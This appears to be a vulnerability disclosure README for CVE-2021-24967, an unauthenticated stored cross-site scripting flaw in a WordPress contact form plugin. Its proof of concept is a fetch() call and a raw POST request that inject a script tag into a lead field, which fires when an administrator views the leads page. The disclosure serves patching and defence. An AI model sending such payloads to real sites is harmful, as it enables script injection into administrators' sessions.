CVE-2021-24967 /

..
README.md	Loading last commit info...

README.md

Contact Form & Lead Form Elementor Builder < 1.6.4 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not sanitise and escape some lead values, which could allow unauthenticated users to perform Cross-Site Scripting attacks against logged in admin viewing the inserted Leads

Proof of Concept

fetch("https://example.com/wp-admin/admin-ajax.php", {

  "headers": {

    "content-type": "application/x-www-form-urlencoded; charset=UTF-8",

  },

  "body": "name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data",

  "method": "POST",

  });



POST /wp-admin/admin-ajax.php HTTP/1.1

Accept: */*

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

Content-type: application/x-www-form-urlencoded; charset=UTF-8

Content-Length: 136

Connection: close



name_1=%3Cscript%3Ealert(/XSS/)%3B%3C%2Fscript%3E&email_2=aa%40bb.cc&number_3=434323232&message_4=x&hidden_field=1&action=Save_Form_Data



The XSS will be triggered when viewing the Leads at https://example.com/wp-admin/admin.php?page=all-form-leads